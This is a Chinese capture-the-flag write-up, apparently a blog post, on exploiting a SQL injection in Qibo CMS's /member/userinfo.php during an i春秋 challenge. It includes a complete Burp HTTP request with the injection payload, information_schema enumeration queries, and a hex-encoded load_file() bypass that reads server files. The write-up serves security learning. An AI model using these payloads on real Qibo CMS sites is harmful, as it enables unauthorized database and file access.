再见CMS

作者: Yix1a | 来源:发表于2019-06-02 17:06 被阅读0次
    • 搜索最下面的备号发现是齐博cms
    • 查找齐博cms的漏洞。匹配各种目录的存在否,发现/member/userinfo.php SQL注入漏洞 可能有效。
    • http://www.anquan.us/static/bugs/wooyun-2014-080259.html这个连接有详细过程
    • 翻到最后,根据漏洞在burpsuite构造payload
    POST /member/userinfo.php?job=edit&step=2 HTTP/1.1
    Host: 1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com/member/homepage.php?uid=3
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 267
    Connection: close
    Cookie: USR=m56znlt5%0923%091559486775%09http%3A%2F%2F1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com%2Fmember%2Fhomepage.php%3Fuid%3D4; __jsluid=7d7f069fe967182647342ec73e505d82; passport=3%09admin1%09AwUEAFFQUQMBVwQGXlUBUV0DAA8OW1VVBQxUAgFaV1M%3D57f744ae5a
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    
    truename=xxxx%0000&Limitword[000]=&email=admin1@qq.com&provinceid= , address=(select database() ) where uid = 3 %23 
    
    • 注意构造漏洞的时候一定要替换成自己的注册东西。
    • 最后发现成功爆出数据库blog.


      图片.png
    • 用sql笔记中的内容继续构造,但是发现后面居然过滤',"等,加上了\号。
    • 既然第一个数据库都可爆出来,那么绕过就很简单啊。
    • 让= 后面替换成查找语句就行了。例如
    select group_concat(table_name)  from information_schema.tables where table_schema=(select table_schema from information_schema.tables group by table_schema limit 1,1  )
    
    • 一直查到最后,发现没有什么flag。最后看wp发现flag在var/www/html/里面用sql注入文件查找弄出来
    • 即select load_file('/var/www/html/flag.php'),但是因为'号被过滤所以要用ASCII HEX的方式了。select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870)
    • 因为查出来的php文件,而不是html文件,不会在页面显示,所以去查看源码。
    • 得到flag 图片.png

    相关文章

      网友评论

          本文标题:再见CMS

          本文链接:https://www.haomeiwen.com/subject/tzixxctx.html